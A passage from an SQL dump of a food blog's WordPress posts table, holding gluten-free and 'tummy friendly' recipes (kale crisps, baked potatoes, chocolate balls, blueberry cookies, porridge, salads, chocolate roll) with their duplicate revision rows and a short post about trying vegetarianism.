\n\n\n\n

3. Rinse and dry the kale. Then, remove the thick stems and add to the oil and toss until coated.

\n\n\n\n

4.  Spread the kale onto a large baking tray lined with baking paper (make sure the kale is not overlapping).

\n\n\n\n

5. Sprinkle over the salt and roast on the bottom shelf of the oven for 5-7 mins, until the kale is crisp and slightly brown.

\n\n\n\n

6. Roast the seeds separately, in a frying pan, until golden.

\n\n\n\n

7. Use a spoon to sprinkle the sunflower seeds over the kale. 

\n\n\n\n

Enjoy!

\n\n\n\n

\n','Kale Crisps','','publish','open','open','','kale-crisps','','','2020-04-06 23:03:40','2020-04-06 23:03:40','',0,'http://tummyrevolution.com/?p=4734',0,'post','',0),(4735,1,'2020-04-05 00:21:08','2020-04-05 00:21:08','\n

Did you know that kale is among the most nutrient dense foods on the planet?? Of course you did!! Kale is still all the rage these days. Our favourite way of using this \'super food\' is to make \'Kale Crisps\', with a sprinkle of sunflower seeds.  Both taste so delicious and different toasted.  For the seeds, it adds a lovely nutty flavour to the seeds.  It\'s a perfect little snack that your tummy will love; or it can be used as a side to a more substantial meal. 

\n\n\n\n

All you need for a light snack for 2 is...

\n\n\n\n

Ingredients

\n\n\n\n

125g kale

\n\n\n\n

2 tbsp olive oil

\n\n\n\n

1/2 tsp sea salt

\n\n\n\n

2 tbsp sunflower seeds

\n\n\n\n

Method

\n\n\n\n

1. Preheat the oven to 150C/300F.

\n\n\n\n

2. Pour the oil into a large bowl.

\n\n\n\n

3. Rinse and dry the kale. Then, remove the thick stems and add to the oil and toss until coated.

\n\n\n\n

4.  Spread the kale onto a large baking tray lined with baking paper (make sure the kale is not overlapping).

\n\n\n\n

5. Sprinkle over the salt and roast on the bottom shelf of the oven for 5-7 mins, until the kale is crisp and slightly brown.

\n\n\n\n

6. Roast the seeds separately, in a frying pan, until golden.

\n\n\n\n

7. Use a spoon to sprinkle the sunflower seeds over the kale. 

\n\n\n\n

Enjoy!

\n\n\n\n

\n','Kale Crisps','','inherit','closed','closed','','4734-revision-v1','','','2020-04-05 00:21:08','2020-04-05 00:21:08','',4734,'http://tummyrevolution.com/4734-revision-v1/',0,'revision','',0),(4736,1,'2020-04-05 00:21:24','2020-04-05 00:21:24','\n

We\'ve always found potatoes to be very soothing for our tummies. Baked potatoes are so easy to make for either lunch or dinner and you can vary the toppings to suit your taste. Sweet potatoes are unfortunately of the menu as they are high in FODMAP\'s, but ordinary once are ok.

\n\n\n\n

Potatoes seem to have bit of a bad reputation at the moment because it\'s fairly high in carbohydrates, but you might be surprised to know how nutritious it really is.
A large potato contains about 60 percent of the daily value for vitamin D and 45 percent of the daily value for vitamin C. It also contains 35 percent of the daily value for B-6, and 15% for thiamin, niacin, magnesium and iron.

\n\n\n\n

With some healthy toppings a baked potato can actually be a really healthy, nutritious meal that your tummy will love. 

\n\n\n\n

 We hope you enjoy it!

\n\n\n\n

Loaded baked potato

\n\n\n\n

Serves 1-2 

Ingredients
1-2 large baked potatoes
sea salt and pepper for seasoning 

suggested toppings 
3-4 grapes 
3-4 pineapple chunks 
1 grated carrot 
1 spring onion (green part only) chopped up 
3-4 olives 
2-3 cherry tomatoes 
a small bit of a cucumber cut in cunks 
1 tbsp mixed seeds (pumkin, sunflower and sesame seeds) 
a small bit of a pepper 
1-2 tbsp grated cheese 
1-2 slices parma ham 

METHOD
1. preheat the oven to 200ºC/390ºF 
2. If needed wash and dry the potatoes 
3. prick the potatos all over and rub with olive oil. Sprinkle over some seasalt and pepper 4. Place the potatoes directly onto the oven rack (no foil needed) and roast in the middle of the oven for 1h -1h 20mins. If you’re short of time you can microwave the potatoes for 5 minutes to soften and then finish them of in the oven for 35-40 mins, 
5. Serve with a selection of listed toppings of your choice

\n\n\n\n
\"\"/
\n','Loaded baked potato','','inherit','closed','closed','','4733-revision-v1','','','2020-04-05 00:21:24','2020-04-05 00:21:24','',4733,'http://tummyrevolution.com/4733-revision-v1/',0,'revision','',0),(4737,1,'2020-04-05 00:21:48','2020-04-05 00:21:48','\n

We are big fans of homemade treats and are always on the lookout for good tummy friendly treats that we whisk up quickly when we get a craving. This recipe is actually from my (Sara\'s) childhood. I grew up in Sweden where these chocolate balls are very popular and children make them as a treat. There are many heathy adaptations of the traditional recipe available and you can choose to use coconut oil instead of butter and maple syrup instead of sugar, but having tried lots of different versions of chocolate balls, we think the old traditional recipe taste the best. It\'s super easy to make as it requires no cooking and is also perfect for children to make.

\n\n\n\n

Once made you can keep them in a sealed container in the fridge and just get one or two out when you have a craving and need a treat :-)

Have a try, they are super tasty!

\n\n\n\n
\"\"/
\n\n\n\n


Ingredients
2 tbsp raw cacao
4 tbsp sugar
100 grams butter
300 ml gluten free oats
1-2 table spoons coffee
2 drops pure vanilla extract (read lable to make sure it\'s pure)
A little bit of desiccated coconut to roll the balls in (alternatively some cacao powder)

\n\n\n\n

Method
1. Scatter the desiccated coconut on a round dinner plate
2. Add all the other ingredients to a large bowel and mix together well with a wooden spoon or even better, with your hands.
3. Once all ingredients have been well blended, pick up a small amount and form into a ball. Roll the ball in the desiccated coconut and place onto a plate.

 You can store the chocolate balls in a plastic container and keep in the fridge for 1-2 weeks and just get a few out for as and when you\'d like to treat yourself.

\n\n\n\n
\"\"/
\n','Delicious no bake chocolate treats','','publish','open','open','','delicious-no-bake-chocolate-treats','','','2020-04-06 23:15:30','2020-04-06 23:15:30','',0,'http://tummyrevolution.com/?p=4737',0,'post','',0),(4738,1,'2020-04-05 00:22:07','2020-04-05 00:22:07','\n

If you like cookies you will love these soft and chewy blueberry cookies. They\'re a big, big favourite of ours. We can\'t take the credit for this amazing recipe as it\'s made by Sarah at Saucy kitchen and you will find the full recipe on her website (see link below).

\n\n\n\n

Growing up in Sweden (Sara) we went blueberry picking every summer. My grandparents lived in a beautiful nature reserve with a large forest on their doorstep where wild blueberries grew in abundance. We would pick them in summer and then freeze them to last us all winter. My mum would get a portion out of the freezer and we\'d have them as a dessert with hot milk poured over. To this day my parents still go blueberry picking every year and I try to join them when I can. It\'s just a bit tricky for me to bring the blueberries with me on the flight back to the UK or the UAE so I tend to by the organic american type blueberries from the shops here. They are bigger then the Swedish wild once and are not as intense blue whine comes to the \"flesh\". Still they taste pretty good to me and I add them to my porridge most days. Blueberries are of course a really good ingredient when baking, like when used in these cookies.

\n\n\n\n
\"\"/
\n\n\n\n

Picking blueberries in Sweden last summer. As you can see the ground is covered in small blueberry bushes. The wooden blueberry picker is from my grandparents days but still works well. It makes picking much quicker.

\n\n\n\n
\"\"/
\n\n\n\n


Wild swedish blueberries

\n\n\n\n

Apart from being a tummy friendly food, blueberries are also one of the most nutrient-dense foods in the world and contain large levels of antioxidants. The ORAC score of blueberries is an incredible 9,621, which makes it one of the highest antioxidant foods in the world. Consuming just one cup of blueberries provides the following nutrients:

\n\n\n\n
  • Resveratrol
  • Gallic acid
  • Lutein
  • Zeaxanthin 
  • Vitamin K (36 percent DV)
  • Vitamin C  (25 percent DV)
  • Manganese (25 percent DV)
  • Fiber (17 percent DV)

    Northern highbush blueberries are native to the eastern and northeastern United States.
\n\n\n\n

So why not add a few blueberries into your daily diet to boost your antioxidant levels. A wonderful way to start is by making these delicious cookies :)
They are really easy to make and we like that they have less then 10 ingredientsServings: 12 cookiesINGREDIENTS

\n\n\n\n
  • 1/2 cup soften coconut oil or butter 104 grams
  • 3/4 cup dark brown sugar, packed 150 grams
  • 1 teaspoon vanilla
  • 1 egg
  • 1 cup gluten free all purpose flour (140 grams)
  • 1 1/4 cups gluten free oats (106 grams)
  • 1/2 teaspoon baking soda
  • 1/4 teaspoon salt
  • 1/2 cup blueberries 100 grams, fresh or frozen
\n\n\n\n

For the full recipe and instructions visit https://www.asaucykitchen.com/oatmeal-blueberry-cookies/

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n','Oatmeal Blueberry Cookies','','publish','open','open','','oatmeal-blueberry-cookies','','','2020-04-06 23:15:16','2020-04-06 23:15:16','',0,'http://tummyrevolution.com/?p=4738',0,'post','',0),(4739,1,'2020-04-05 00:21:48','2020-04-05 00:21:48','\n

We are big fans of homemade treats and are always on the lookout for good tummy friendly treats that we whisk up quickly when we get a craving. This recipe is actually from my (Sara\'s) childhood. I grew up in Sweden where these chocolate balls are very popular and children make them as a treat. There are many heathy adaptations of the traditional recipe available and you can choose to use coconut oil instead of butter and maple syrup instead of sugar, but having tried lots of different versions of chocolate balls, we think the old traditional recipe taste the best. It\'s super easy to make as it requires no cooking and is also perfect for children to make.

\n\n\n\n

Once made you can keep them in a sealed container in the fridge and just get one or two out when you have a craving and need a treat :-)

Have a try, they are super tasty!

\n\n\n\n
\"\"/
\n\n\n\n


Ingredients
2 tbsp raw cacao
4 tbsp sugar
100 grams butter
300 ml gluten free oats
1-2 table spoons coffee
2 drops pure vanilla extract (read lable to make sure it\'s pure)
A little bit of desiccated coconut to roll the balls in (alternatively some cacao powder)

\n\n\n\n

Method
1. Scatter the desiccated coconut on a round dinner plate
2. Add all the other ingredients to a large bowel and mix together well with a wooden spoon or even better, with your hands.
3. Once all ingredients have been well blended, pick up a small amount and form into a ball. Roll the ball in the desiccated coconut and place onto a plate.

 You can store the chocolate balls in a plastic container and keep in the fridge for 1-2 weeks and just get a few out for as and when you\'d like to treat yourself.

\n\n\n\n
\"\"/
\n','Delicious no bake chocolate treats','','inherit','closed','closed','','4737-revision-v1','','','2020-04-05 00:21:48','2020-04-05 00:21:48','',4737,'http://tummyrevolution.com/4737-revision-v1/',0,'revision','',0),(4740,1,'2020-04-05 00:22:07','2020-04-05 00:22:07','\n

If you like cookies you will love these soft and chewy blueberry cookies. They\'re a big, big favourite of ours. We can\'t take the credit for this amazing recipe as it\'s made by Sarah at Saucy kitchen and you will find the full recipe on her website (see link below).

\n\n\n\n

Growing up in Sweden (Sara) we went blueberry picking every summer. My grandparents lived in a beautiful nature reserve with a large forest on their doorstep where wild blueberries grew in abundance. We would pick them in summer and then freeze them to last us all winter. My mum would get a portion out of the freezer and we\'d have them as a dessert with hot milk poured over. To this day my parents still go blueberry picking every year and I try to join them when I can. It\'s just a bit tricky for me to bring the blueberries with me on the flight back to the UK or the UAE so I tend to by the organic american type blueberries from the shops here. They are bigger then the Swedish wild once and are not as intense blue whine comes to the \"flesh\". Still they taste pretty good to me and I add them to my porridge most days. Blueberries are of course a really good ingredient when baking, like when used in these cookies.

\n\n\n\n
\"\"/
\n\n\n\n

Picking blueberries in Sweden last summer. As you can see the ground is covered in small blueberry bushes. The wooden blueberry picker is from my grandparents days but still works well. It makes picking much quicker.

\n\n\n\n
\"\"/
\n\n\n\n


Wild swedish blueberries

\n\n\n\n

Apart from being a tummy friendly food, blueberries are also one of the most nutrient-dense foods in the world and contain large levels of antioxidants. The ORAC score of blueberries is an incredible 9,621, which makes it one of the highest antioxidant foods in the world. Consuming just one cup of blueberries provides the following nutrients:

\n\n\n\n
  • Resveratrol
  • Gallic acid
  • Lutein
  • Zeaxanthin 
  • Vitamin K (36 percent DV)
  • Vitamin C  (25 percent DV)
  • Manganese (25 percent DV)
  • Fiber (17 percent DV)

    Northern highbush blueberries are native to the eastern and northeastern United States.
\n\n\n\n

So why not add a few blueberries into your daily diet to boost your antioxidant levels. A wonderful way to start is by making these delicious cookies :)
They are really easy to make and we like that they have less then 10 ingredientsServings: 12 cookiesINGREDIENTS

\n\n\n\n
  • 1/2 cup soften coconut oil or butter 104 grams
  • 3/4 cup dark brown sugar, packed 150 grams
  • 1 teaspoon vanilla
  • 1 egg
  • 1 cup gluten free all purpose flour (140 grams)
  • 1 1/4 cups gluten free oats (106 grams)
  • 1/2 teaspoon baking soda
  • 1/4 teaspoon salt
  • 1/2 cup blueberries 100 grams, fresh or frozen
\n\n\n\n

For the full recipe and instructions visit https://www.asaucykitchen.com/oatmeal-blueberry-cookies/

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n','Oatmeal Blueberry Cookies','','inherit','closed','closed','','4738-revision-v1','','','2020-04-05 00:22:07','2020-04-05 00:22:07','',4738,'http://tummyrevolution.com/4738-revision-v1/',0,'revision','',0),(4741,1,'2020-04-05 00:22:55','2020-04-05 00:22:55','\n

If you, like me, grew up eating bland boring porridge, you might not get that exciting at the thought of having porridge for breakfast. But it can be much more exciting if you just add the right things to it. 
Porridge is a bit like potatoes - quite plain and boring if served on their own but if you add things such as butter, salt or spices potatoes taste lovely. The same goes for porridge and when you start experimenting by mixing your porridge with healthy ingredients you might just find that porridge can be a delicious and excellent breakfast. Porridge is of course also great for your tummy and health with healthy fiber and micronutrients to set you up for a good start to the day.

\n\n\n\n
\"\"/
\n\n\n\n

Now, there\'s lots of things you can mix your porridge with so the best thing is to choose a few and then add them to your porridge one at the time to see if you like the mix.

\n\n\n\n

Some ingredients can be better to mix in with your orridge such as vanilla paste/extract, maple syrup, mashed banana. Whilst others work better as a topping such as berries, fruit, nuts and seeds. But you might find that you prefer mixing it all up and that\'s fine too - whatever takes your fancy :)

For today we\'ve chosen to make a bit of a tropical themed porridge with pineapple and banana. We also mixed the porridge with a few drops of vanilla paste and some maple syrup. It\'s a really lovely mix and takes a bland porridge to a totally new level. See the recipe below.

\n\n\n\n

We made this porridge with water and then added milk, but if you prefer your porridge a bit creamier you can make the porridge with some type of milk such as almond, rice or lactose free milk.

\n\n\n\n

Here are some of our other favourite tummy friendly porridge toppings to try out:

\n\n\n\n

Fruit:
Banana, Pineapple, passion fruit, kiwi, 

Berries:
Blueberries, raspberries and strawberries

\n\n\n\n

Nuts:
Macadamia nuts, walnuts and pecan nuts

Seeds:
Sunflower seeds, chia seeds and sunflower seeds

Other:
Dark chocolate (let it melt on the porridge or stir it in), maple syrup, peanut butter, vanilla paste or extract.

\n\n\n\n
\"\"/
\n\n\n\n


If you suffer with a sensitive tummy it\'s worth remembering to add small portions of fruit, berries and chocolate or similar rather then large. Large portions can upset a sensitive tummy so avoid overloading your porridge however tempting it may be. 

\n\n\n\n

TROPICAL PORRIDGE: 

\n\n\n\n

Makes 1 Serving
½ cup (50 g) porridge oats (Choose gluten free oats if you have coeliac disease) 
1 ½ cup (350ml) water or almond, rice or lactose free milk 

Toppings
5-8 pineapple chunks
3-5 slices of banana
1-2 drops of vanilla paste/extract
1/2 tbsp maple syrup

\n\n\n\n

Directions
1. Put the oats in a small saucepan, pour over your preferred milk or water. Bring to boil and simmer for 4-5 minutes, stirring occasionally and watching that it doesn’t catch the bottom of the pan. 
2. To serve, pour into a bowl and add or stir in the the toppings. Serve hot!

\n','Tropical porridge','','publish','open','open','','tropical-porridge','','','2020-04-27 11:02:10','2020-04-27 11:02:10','',0,'http://tummyrevolution.com/?p=4741',0,'post','',0),(4742,1,'2020-04-05 00:22:47','2020-04-05 00:22:47','\n

I know it’s still winter for many of you and perhaps you don’t fancy the thought of salads when it’s cold but I’m a real fan of salads both in winter and summer. When I grew up a salad would typically be green leafs, tomato and cucumber, but nowadays there are so many new exiting ways of making salads. There’s warm and cold salads, salads with fruit, meat, nuts, noodles etc, to suit all seasons and taste.

\n\n\n\n
\"\"/
\n\n\n\n

Eating salads is a really easy way to work in a few servings of vegetables and/or fruit. In addition to vegetables and fruit you can add almost anything you like such as quinoa, gluten free pasta, chicken, egg, nuts, herbs etc. I think the secret to a salad is finding the right balance between ingredients. You don’t want to overload your salad but you don’t want it to be too one sided or for it to just contain a few salad leaves either.

Dressings are really important too. I personally think a dressing can make or break a salad. A really good dressing can really enhance a salad and make it super tasty compared to what it would have been without it. I always make my own dressing to make sure it’s tummy friendly and you can find some of my favourite once below.

When making up a salad I tend to put my tummy friendly ingredients into different groups (see below) and I then choose a few vegetables fro the vegetable groups and one or two ingredients from the other groups That way I get a good mix of vitamins, proteins, healthy fats. There’s really no rule as to how you mix up the ingredients/groups but here’s a few examples of how I would make up some salads:

\n\n\n\n
  • If I’m making a smoked salmon salad I choose something like: lambs lettuce, cucumber, spring onion (green part), cooked egg, roasted pine nuts, smoked salmon and dill. 

    Served with a yoghurt dressing.
  • For a warm winter salad I’d choose to roast some vegetable like courgette, pumpkin, broccoli and parsnip. I’d mix that with some cooked quinoa, blanched kale, olives chives and chopped up walnuts. Then sprinkle some Parmesan on top

    I’d serve it with my mums super tasty dressing
\n\n\n\n
\"\"/
\n\n\n\n
  • If I’m making a summer salad I’d use strawberries, cucumber, mixed cherry tomatoes, Parma ham, feta cheese, dill

    Serve this with a classic vinaigrette dressing
\n\n\n\n

In today’s salad I’ve used lambs lettuce, red cabbage, fennel, toasted sunflower seeds, feta cheese, roasted potatoes and green beans. Served with a herb dressing.

\n\n\n\n


Have a go at making your own salad with things you like. Choose a few things from the vegetable groups and then one or two things from the other groups when making up a salad. Please let me know what your favourite tummy friendly salad is and how you make it.

COLD VEGETABLES

\n\n\n\n

Cucumber
Tomatoes
Peppers
Grated carrot
Cabbage (white or red)
Courgette
Olives
Fennel
Bean sprouts

\n\n\n\n

ROASTED VEGETABLES
Courgette
Pumpkin
Carrots
Broccoli
Parsnip
Aubergine 
Peppers
tomatoes
Olives
Green beans
Potato (roasted or boiled)

Leafy greens and lettuce
Mixed salads 
Rocket
Baby spinach
Kale (I usually blanche it)
Little gems lettuce
Lambs Lettuce

NUTS AND SEEDS
Walnuts
Pine nuts
Peacan nuts
Macadamia nuts
Sunflowers seeds
Chia seeds

(Most nuts and seeds can be toasted to give them a different flavour)

FRUIT AND BERRIES
Oranges
Clementines
Lemon
Blueberries
Strawberries
Cranberries (mainly dried)

\n\n\n\n

FOR FLAVOURING OR INSTEAD OF ONION 
Spring onion (green part only)
Leek (green part only)
Chives

HERBS & SPICES
Oregano (fresh or dried)
Basil – fresh or dried)
Dill 
Parsley
Coriander 
Ginger
Mint

\n\n\n\n

PASTA & GRAINS
Rice (brown, white, wild etc)
Gluten free pasta (any pasta of your choice)
Quinoa

MEATS & FISH 
Smoked salmon
Parma ham/ham
Chicken (cooked or grilled)
Steak (cut into strips)

DAIRY
Egg
Cheese (mozzarella, Feta, cheddar, etc)
Parmesan

(There\'s probably lots of other ingredients so please share your ideas of what you think could be added to the list.)

DRESSINGS:

\n\n\n\n

Classic Vinaigrette

\n\n\n\n

1/2 cup olive oil.
2 tbsp red wine vinegar
2 tbsp Dijon mustard
1/2 tsp salt pepper to taste

\n\n\n\n

Herb dressing

\n\n\n\n

½ cup extra virgin olive oil

\n\n\n\n

1 cup mixed fresh herbs such as mint, parsley or basil
1 tbsp garlic infused olive oil
1 tbsp limejuice
salt and pepper to taste

Yoghurt dressing (great for meat or fish salads)
5 tbsp of Lactose free plain yogurt

\n\n\n\n

1 tsp maple syrup

\n\n\n\n

pinch of salt

\n\n\n\n

1 tsp limejuice

\n\n\n\n

3 tbsp chopped fresh coriander

\n\n\n\n

1 tbsp garlic infused olive oil

My mum’s super tasty dressing
¼ cup extra virgin olive oil
2 tbsp balsamic vinegar
1 tbsp maple syrup
1 tsp Dijon mustard
salt and pepper to taste

\n\n\n\n
\"\"/
\n','Tummy Friendly Salalds','','publish','open','open','','tummy-friendly-salalds','','','2020-04-06 23:14:32','2020-04-06 23:14:32','',0,'http://tummyrevolution.com/?p=4742',0,'post','',0),(4743,1,'2020-04-05 00:22:47','2020-04-05 00:22:47','\n

I know it’s still winter for many of you and perhaps you don’t fancy the thought of salads when it’s cold but I’m a real fan of salads both in winter and summer. When I grew up a salad would typically be green leafs, tomato and cucumber, but nowadays there are so many new exiting ways of making salads. There’s warm and cold salads, salads with fruit, meat, nuts, noodles etc, to suit all seasons and taste.

\n\n\n\n
\"\"/
\n\n\n\n

Eating salads is a really easy way to work in a few servings of vegetables and/or fruit. In addition to vegetables and fruit you can add almost anything you like such as quinoa, gluten free pasta, chicken, egg, nuts, herbs etc. I think the secret to a salad is finding the right balance between ingredients. You don’t want to overload your salad but you don’t want it to be too one sided or for it to just contain a few salad leaves either.

Dressings are really important too. I personally think a dressing can make or break a salad. A really good dressing can really enhance a salad and make it super tasty compared to what it would have been without it. I always make my own dressing to make sure it’s tummy friendly and you can find some of my favourite once below.

When making up a salad I tend to put my tummy friendly ingredients into different groups (see below) and I then choose a few vegetables fro the vegetable groups and one or two ingredients from the other groups That way I get a good mix of vitamins, proteins, healthy fats. There’s really no rule as to how you mix up the ingredients/groups but here’s a few examples of how I would make up some salads:

\n\n\n\n
  • If I’m making a smoked salmon salad I choose something like: lambs lettuce, cucumber, spring onion (green part), cooked egg, roasted pine nuts, smoked salmon and dill. 

    Served with a yoghurt dressing.
  • For a warm winter salad I’d choose to roast some vegetable like courgette, pumpkin, broccoli and parsnip. I’d mix that with some cooked quinoa, blanched kale, olives chives and chopped up walnuts. Then sprinkle some Parmesan on top

    I’d serve it with my mums super tasty dressing
\n\n\n\n
\"\"/
\n\n\n\n
  • If I’m making a summer salad I’d use strawberries, cucumber, mixed cherry tomatoes, Parma ham, feta cheese, dill

    Serve this with a classic vinaigrette dressing
\n\n\n\n

In today’s salad I’ve used lambs lettuce, red cabbage, fennel, toasted sunflower seeds, feta cheese, roasted potatoes and green beans. Served with a herb dressing.

\n\n\n\n


Have a go at making your own salad with things you like. Choose a few things from the vegetable groups and then one or two things from the other groups when making up a salad. Please let me know what your favourite tummy friendly salad is and how you make it.

COLD VEGETABLES

\n\n\n\n

Cucumber
Tomatoes
Peppers
Grated carrot
Cabbage (white or red)
Courgette
Olives
Fennel
Bean sprouts

\n\n\n\n

ROASTED VEGETABLES
Courgette
Pumpkin
Carrots
Broccoli
Parsnip
Aubergine 
Peppers
tomatoes
Olives
Green beans
Potato (roasted or boiled)

Leafy greens and lettuce
Mixed salads 
Rocket
Baby spinach
Kale (I usually blanche it)
Little gems lettuce
Lambs Lettuce

NUTS AND SEEDS
Walnuts
Pine nuts
Peacan nuts
Macadamia nuts
Sunflowers seeds
Chia seeds

(Most nuts and seeds can be toasted to give them a different flavour)

FRUIT AND BERRIES
Oranges
Clementines
Lemon
Blueberries
Strawberries
Cranberries (mainly dried)

\n\n\n\n

FOR FLAVOURING OR INSTEAD OF ONION 
Spring onion (green part only)
Leek (green part only)
Chives

HERBS & SPICES
Oregano (fresh or dried)
Basil – fresh or dried)
Dill 
Parsley
Coriander 
Ginger
Mint

\n\n\n\n

PASTA & GRAINS
Rice (brown, white, wild etc)
Gluten free pasta (any pasta of your choice)
Quinoa

MEATS & FISH 
Smoked salmon
Parma ham/ham
Chicken (cooked or grilled)
Steak (cut into strips)

DAIRY
Egg
Cheese (mozzarella, Feta, cheddar, etc)
Parmesan

(There\'s probably lots of other ingredients so please share your ideas of what you think could be added to the list.)

DRESSINGS:

\n\n\n\n

Classic Vinaigrette

\n\n\n\n

1/2 cup olive oil.
2 tbsp red wine vinegar
2 tbsp Dijon mustard
1/2 tsp salt pepper to taste

\n\n\n\n

Herb dressing

\n\n\n\n

½ cup extra virgin olive oil

\n\n\n\n

1 cup mixed fresh herbs such as mint, parsley or basil
1 tbsp garlic infused olive oil
1 tbsp limejuice
salt and pepper to taste

Yoghurt dressing (great for meat or fish salads)
5 tbsp of Lactose free plain yogurt

\n\n\n\n

1 tsp maple syrup

\n\n\n\n

pinch of salt

\n\n\n\n

1 tsp limejuice

\n\n\n\n

3 tbsp chopped fresh coriander

\n\n\n\n

1 tbsp garlic infused olive oil

My mum’s super tasty dressing
¼ cup extra virgin olive oil
2 tbsp balsamic vinegar
1 tbsp maple syrup
1 tsp Dijon mustard
salt and pepper to taste

\n\n\n\n
\"\"/
\n','Tummy Friendly Salalds','','inherit','closed','closed','','4742-revision-v1','','','2020-04-05 00:22:47','2020-04-05 00:22:47','',4742,'http://tummyrevolution.com/4742-revision-v1/',0,'revision','',0),(4744,1,'2020-04-05 00:22:55','2020-04-05 00:22:55','\n

If you, like me, grew up eating bland boring porridge, you might not get that exciting at the thought of having porridge for breakfast. But it can be much more exciting if you just add the right things to it. 
Porridge is a bit like potatoes - quite plain and boring if served on their own but if you add things such as butter, salt or spices potatoes taste lovely. The same goes for porridge and when you start experimenting by mixing your porridge with healthy ingredients you might just find that porridge can be a delicious and excellent breakfast. Porridge is of course also great for your tummy and health with healthy fiber and micronutrients to set you up for a good start to the day.

\n\n\n\n
\"\"/
\n\n\n\n

Now, there\'s lots of things you can mix your porridge with so the best thing is to choose a few and then add them to your porridge one at the time to see if you like the mix.

\n\n\n\n

Some ingredients can be better to mix in with your orridge such as vanilla paste/extract, maple syrup, mashed banana. Whilst others work better as a topping such as berries, fruit, nuts and seeds. But you might find that you prefer mixing it all up and that\'s fine too - whatever takes your fancy :)

For today we\'ve chosen to make a bit of a tropical themed porridge with pineapple and banana. We also mixed the porridge with a few drops of vanilla paste and some maple syrup. It\'s a really lovely mix and takes a bland porridge to a totally new level. See the recipe below.

\n\n\n\n

We made this porridge with water and then added milk, but if you prefer your porridge a bit creamier you can make the porridge with some type of milk such as almond, rice or lactose free milk.

\n\n\n\n

Here are some of our other favourite tummy friendly porridge toppings to try out:

\n\n\n\n

Fruit:
Banana, Pineapple, passion fruit, kiwi, 

Berries:
Blueberries, raspberries and strawberries

\n\n\n\n

Nuts:
Macadamia nuts, walnuts and pecan nuts

Seeds:
Sunflower seeds, chia seeds and sunflower seeds

Other:
Dark chocolate (let it melt on the porridge or stir it in), maple syrup, peanut butter, vanilla paste or extract.

\n\n\n\n
\"\"/
\n\n\n\n


If you suffer with a sensitive tummy it\'s worth remembering to add small portions of fruit, berries and chocolate or similar rather then large. Large portions can upset a sensitive tummy so avoid overloading your porridge however tempting it may be. 

\n\n\n\n

TROPICAL PORRIDGE: 

\n\n\n\n

Makes 1 Serving
½ cup (50 g) porridge oats (Choose gluten free oats if you have coeliac disease) 
1 ½ cup (350ml) water or almond, rice or lactose free milk 

Toppings
5-8 pineapple chunks
3-5 slices of banana
1-2 drops of vanilla paste/extract
1/2 tbsp maple syrup

\n\n\n\n

Directions
1. Put the oats in a small saucepan, pour over your preferred milk or water. Bring to boil and simmer for 4-5 minutes, stirring occasionally and watching that it doesn’t catch the bottom of the pan. 
2. To serve, pour into a bowl and add or stir in the the toppings. Serve hot!

\n','Tropical porridge','','inherit','closed','closed','','4741-revision-v1','','','2020-04-05 00:22:55','2020-04-05 00:22:55','',4741,'http://tummyrevolution.com/4741-revision-v1/',0,'revision','',0),(4745,1,'2020-04-05 00:23:35','2020-04-05 00:23:35','\n
\"\"/
\n\n\n\n

This week I\'m back in Sweden visiting my family for Easter. It\'s safe to say spring has NOT arrived to Sweden yet. It\'s absolutely freezing and there\'s still snow in many places. It\'s very hard to get used to the cold when you come directly from Dubai so I\'m wearing about 6 layers of cloths to keep me warm if I go outside.

It\'s lovely spending time with my family and I especially enjoy some time with my mum in the kitchen as we both enjoy cooking and baking. My mum is a very, very good cook and baker. She\'s definitely one of my biggest inspirations. She\'s a bit like a living cookery book in that she seems to knows everything. I guess you could say she\'s quite traditional when it comes to her baking and cooking but she mixes it with new things too and I like that. I was just 19 years old when I moved to the UK and by that time I wasn\'t really that interested in cooking and could hardly fry and egg so when I get that chance to spend some time with my mum these days I try to catch up on all the knowledge I missed out on when I moved away.

\n\n\n\n
\"\"/
\n\n\n\n


MUM AND DAD

\n\n\n\n

My mum is not really used to gluten free cooking/baking but she\'s happy to give it a try when I\'m at home. We made this great chocolate roll cake that\'s gluten free. It was also my nice\'s birthday so we thought some kind of cake was definitely   needed.

\n\n\n\n
\"\"/
\n\n\n\n

I really like making roll cakes like this one because they\'re quick to make (only ca 5 min in the oven) and you can fill them so many yummy things like fruits, berries, nuts, jam, cream etc. to add your own touch to it.

\n\n\n\n

The cream and raspberries taste surprisingly good together with the chocolate in this cake. I hope you enjoy it too!

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
3 large eggs
150ml / 0.6cup caster sugar
5 tbsp corn starch
3 tbsp cacao powder
1 tsp baking powder

\n\n\n\n

FILLING
2dl whipping cream / coconut cream
200g raspberries

\n\n\n\n

INSTRUCTIONS
1. Preheat the oven to 220 C / 430 F
2. Line a baking tray with grease proof baking paper.
3. Whisk the eggs and sugar until the mixture is pale yellow, thick and fluffy.
4. Mix the corn starch, cacao, and baking powder. Fold the flour mix into the egg mix and carefully, making sure it\'s all mixed together.
5. Spread the mix out on the lined baking tray. The mix should be equally spread over the whole baking tray.
6. Bake in the oven for about 5 minutes. Careful not to burn it.
7. Sprinkle some sugar over the surface of the cake. 
8. Place some greased baking paper on a clean kitchen surface. Turn the cake over onto the baking paper. The cake is now upside down with baking paper on top of it. Brush some water onto the baking paper and carefully remove it. Let the cake cool under a clean tea towel.
9. Whip the cream and stir in the raspberries. You can mash up the raspberries a bit if they are big. 
10. Spread out the cram mix onto the cake and spread it out.
11. Carefully Roll up the cake (from the long end) and leave it for a minute before  slicing.

\n\n\n\n
\"\"/
\n','Gluten free chocolate roll with raspberry cream','','publish','open','open','','gluten-free-chocolate-roll-with-raspberry-cream','','','2020-04-06 23:13:54','2020-04-06 23:13:54','',0,'http://tummyrevolution.com/?p=4745',0,'post','',0),(4746,1,'2020-04-05 00:23:19','2020-04-05 00:23:19','\n

In January I decided to go vegetarian for a month to mainly explore eating more vegetables but also to see how it made me feel health wise. Initially I really enjoyed it and my tummy did too. I tried some great new vegetarian recipes out and generally ate more vegetables (I already eat a lot of fruit). After a few weeks I started to realise there were some challenges too. With wheat being one of my trigger foods I found eating out a real challenge. In restaurants I found that most vegetarian dishes contained wheat/gluten and sometimes there were hardly anything I could eat and I ended up eating something not very nutritious like nachos because that\'s all I could have. I found being a wheat/gluten free vegetarian required a lot of planning and in order to stay healthy. As a busy mum of two I didn\'t always have the time to plan meals as well as I probably should have in order to stay healthy. I have therefore decided to continue as a flexitarian :) I will aim to eat vegetarian food as much as possible but on some days and in some situations I will have meat if that\'s a better nutritional choice for me.
I\'d be interested in hearing if anyone else\'s had a similar experience or how they\'ve dealt with the transition or eating meat to becoming a vegetarian.

\n\n\n\n

